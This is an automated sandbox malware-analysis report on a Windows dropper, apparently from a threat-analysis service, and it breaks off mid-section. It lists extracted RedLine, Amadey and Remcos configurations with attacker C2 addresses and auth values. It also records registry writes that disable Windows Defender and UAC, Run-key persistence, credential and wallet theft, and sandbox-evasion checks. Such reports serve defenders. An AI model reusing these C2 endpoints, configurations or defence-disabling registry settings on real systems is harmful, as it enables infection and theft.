Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
03-02-2023 10:55
Static task
static1
Behavioral task
behavioral1
Sample
9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe
Resource
win10v2004-20220901-en
General
-
Target
9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe
-
Size
603KB
-
MD5
1d5c91e93d5daa882ea28c5e3c985018
-
SHA1
385c2c38d59c7b55a8d12bd99ad417de50dd7da3
-
SHA256
9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45
-
SHA512
18c28534f06f4afbb6372c2873fda4fda6748a6d9dc0a02d277ea12c1b607b79c77c7d6631b078e82136c49ae9975997497b864c30f41a3db362039fb5013aa3
-
SSDEEP
12288:/nmWQGvhT0qfqcEtOTy9IRJqzHaIGBUTx2UhE/yq8PAx5BAQi:/m6vB0qfMOaWe7GGx2ojIx5B5i
Malware Config
Extracted
redline
redko
62.204.41.170:4179
-
auth_value
9bcf7b0620ff067017d66b9a5d80b547
Extracted
amadey
3.66
193.233.20.4/t6r48nSa/index.php
62.204.41.88/9vdVVVjsw/index.php
Extracted
redline
temposs6678
82.115.223.9:15486
-
auth_value
af399e6a2fe66f67025541cf71c64313
Extracted
redline
gonka
62.204.41.170:4179
-
auth_value
f017b1096da5cc257f8ca109051c5fbb
Extracted
redline
@REDLINEVIP Cloud (TG: @FATHEROFCARDERS)
151.80.89.233:13553
-
auth_value
fbee175162920530e6bf470c8003fa1a
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
redline
bigdick
185.254.37.212:80
-
auth_value
88290259fe8dc49da48b125d03e6788c
Extracted
redline
85.31.44.66:17742
-
auth_value
e9a89e5b72a729171b1655add99ee280
Extracted
redline
Inkida
195.201.30.165:80
-
auth_value
29132c501e296827c0ca24c0850430ea
Extracted
remcos
Crypt
185.225.73.67:1050
-
audio_folder
576ruythg6534trewf
-
audio_path
%WinDir%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
76y5trfed675ytg.exe
-
copy_folder
kjhgfdc
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
true
-
install_flag
true
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
654ytrf654trf654ytgref.dat
-
keylog_flag
false
-
keylog_folder
67yrtg564tr6754yter
-
mouse_option
false
-
mutex
89765y4tergfw6587ryute-80UMP1
-
screenshot_crypt
false
-
screenshot_flag
true
-
screenshot_folder
67y4htergf65trgewfd654tyrfg
-
screenshot_path
%Temp%
-
screenshot_time
10
-
startup_value
6754ytr756ytr7654yretg8765uyt
-
take_screenshot_option
true
-
take_screenshot_time
5
-
take_screenshot_title
bank
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect rhadamanthys stealer shellcode 3 IoCs
Processes:
resource yara_rule behavioral1/memory/4268-281-0x0000000000670000-0x000000000068D000-memory.dmp family_rhadamanthys behavioral1/memory/3268-279-0x0000000001070000-0x000000000108D000-memory.dmp family_rhadamanthys behavioral1/memory/4268-327-0x0000000000670000-0x000000000068D000-memory.dmp family_rhadamanthys -
Detects Smokeloader packer 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4076-359-0x0000000000400000-0x0000000000409000-memory.dmp family_smokeloader -
Processes:
loda.exenika.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" loda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" loda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" nika.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" nika.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" nika.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection loda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" loda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" loda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" loda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" nika.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" nika.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
redline2.exedescription pid process target process PID 4528 created 2464 4528 redline2.exe taskhostw.exe -
Processes:
reg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exerundll32.exeflow pid process 58 4164 rundll32.exe 59 3852 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mian.exelebro.exemeta2.exenbveek.exedwn.exeCBqrmoFax.exemnolyk.exenbveek.exeNOTallowedtocrypt.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation mian.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation lebro.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation meta2.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation dwn.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation CBqrmoFax.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation mnolyk.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation NOTallowedtocrypt.exe -
Executes dropped EXE 36 IoCs
Processes:
hook.exeloda.exeredko.exeaniam.exemian.exemnolyk.exeani.exenika.exerepa.exelebro.exenbveek.exemeta3.exemeta2.exenbveek.exeredline2.execc.exeredline1.exevideo.exemeta4.exeredline4.exeredline3.exemnolyk.exenbveek.exeAurora.exeredline3.exeEngine.exeNOTallowedtocrypt.exemeta5.exe76y5trfed675ytg.exedwn.exemeta5.exeCBqrmoFax.exentlhost.exeRussian.exe.pifnbveek.exemnolyk.exepid process 4568 hook.exe 2236 loda.exe 1916 redko.exe 944 aniam.exe 4476 mian.exe 1384 mnolyk.exe 4164 ani.exe 4992 nika.exe 3264 repa.exe 2224 lebro.exe 4896 nbveek.exe 3448 meta3.exe 512 meta2.exe 2208 nbveek.exe 4528 redline2.exe 4268 cc.exe 480 redline1.exe 4476 video.exe 396 meta4.exe 2648 redline4.exe 1220 redline3.exe 2684 mnolyk.exe 1280 nbveek.exe 2980 Aurora.exe 1996 redline3.exe 3676 Engine.exe 4044 NOTallowedtocrypt.exe 1488 meta5.exe 308 76y5trfed675ytg.exe 5032 dwn.exe 4076 meta5.exe 3252 CBqrmoFax.exe 3288 ntlhost.exe 1356 Russian.exe.pif 3008 nbveek.exe 4576 mnolyk.exe -
Loads dropped DLL 7 IoCs
Processes:
redline2.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exepid process 4528 redline2.exe 3852 rundll32.exe 3104 rundll32.exe 3732 rundll32.exe 5072 rundll32.exe 5084 rundll32.exe 3368 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\SETUP_22269\Engine.exe upx C:\Users\Admin\AppData\Local\Temp\SETUP_22269\Engine.exe upx behavioral1/memory/3676-302-0x0000000000400000-0x0000000000558000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\SETUP_22269\Engine.exe upx behavioral1/memory/3676-353-0x0000000000400000-0x0000000000558000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Processes:
loda.exenika.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" loda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" nika.exe -
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
Processes:
rundll32.exeexplorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 21 IoCs
Processes:
hook.exeaniam.exeNOTallowedtocrypt.exeiexplore.exevideo.exe76y5trfed675ytg.exe9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exedwn.exemnolyk.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce hook.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" aniam.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ NOTallowedtocrypt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" video.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run\ 76y5trfed675ytg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ 76y5trfed675ytg.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" 76y5trfed675ytg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" hook.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce aniam.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run\ NOTallowedtocrypt.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" NOTallowedtocrypt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" NOTallowedtocrypt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" 76y5trfed675ytg.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run\ iexplore.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\remcon = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dwn.exe" dwn.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\repa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000015051\\repa.exe" mnolyk.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 40 api.ipify.org -
Suspicious use of SetThreadContext 8 IoCs
Processes:
redline2.exemeta4.exeredline4.exeredline3.exeAurora.exe76y5trfed675ytg.exeiexplore.exemeta5.exedescription pid process target process PID 4528 set thread context of 3404 4528 redline2.exe ngentask.exe PID 396 set thread context of 3816 396 meta4.exe vbc.exe PID 2648 set thread context of 2308 2648 redline4.exe vbc.exe PID 1220 set thread context of 1996 1220 redline3.exe redline3.exe PID 2980 set thread context of 4164 2980 Aurora.exe rundll32.exe PID 308 set thread context of 3564 308 76y5trfed675ytg.exe iexplore.exe PID 3564 set thread context of 1392 3564 iexplore.exe svchost.exe PID 1488 set thread context of 4076 1488 meta5.exe meta5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4632 3036 WerFault.exe 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe 4652 396 WerFault.exe meta4.exe 3156 2648 WerFault.exe redline4.exe 1392 4528 WerFault.exe redline2.exe 4588 4528 WerFault.exe redline2.exe 4824 4268 WerFault.exe cc.exe 692 3852 WerFault.exe rundll32.exe 1772 3732 WerFault.exe rundll32.exe 5004 3368 WerFault.exe rundll32.exe 4656 1356 WerFault.exe Russian.exe.pif 2792 1356 WerFault.exe Russian.exe.pif -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
meta5.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI meta5.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI meta5.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI meta5.exe -
Checks processor information in registry 2 TTPs 58 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Aurora.exerundll32.exerundll32.exesvchost.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Aurora.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information Aurora.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 Aurora.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier rundll32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision Aurora.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Aurora.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 rundll32.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information Aurora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision rundll32.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 2000 schtasks.exe 5072 schtasks.exe 4588 schtasks.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 87 Go-http-client/1.1 -
Modifies registry class 4 IoCs
Processes:
NOTallowedtocrypt.exerundll32.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ NOTallowedtocrypt.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{12C7EA37-D772-46B5-8330-CB45E3A2CBA7} svchost.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{8BC83914-874A-4B88-8AD1-0473AE221BD7} svchost.exe -
Modifies registry key 1 TTPs 3 IoCs
-
NTFS ADS 3 IoCs
Processes:
dwn.exedescription ioc process File created C:\Users\Admin\AppData\Local\Temp\16de06bfb4\programs.bat:start dwn.exe File created C:\Users\Admin\Documents\Documents:ApplicationData dwn.exe File opened for modification C:\Users\Admin\Documents\Documents:ApplicationData dwn.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
loda.exeredko.exenika.exeani.exerepa.exeredline2.exerundll32.exemeta3.exerundll32.exevbc.exepid process 2236 loda.exe 2236 loda.exe 1916 redko.exe 1916 redko.exe 4992 nika.exe 4992 nika.exe 4164 ani.exe 3264 repa.exe 3264 repa.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4164 rundll32.exe 3448 meta3.exe 3448 meta3.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 4528 redline2.exe 3852 rundll32.exe 3852 rundll32.exe 2308 vbc.exe 2308 vbc.exe 4164 rundll32.exe 4164 rundll32.exe -
Suspicious behavior: MapViewOfSection 25 IoCs
Processes:
76y5trfed675ytg.exeiexplore.exemeta5.exeexplorer.exeexplorer.exepid process 308 76y5trfed675ytg.exe 3564 iexplore.exe 4076 meta5.exe 2756 2756 2756 2756 2756 2756 640 explorer.exe 640 explorer.exe 2756 2756 2756 2756 4328 explorer.exe 4328 explorer.exe 2756 2756 2756 2756 2756 2756 2756 2756 -
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
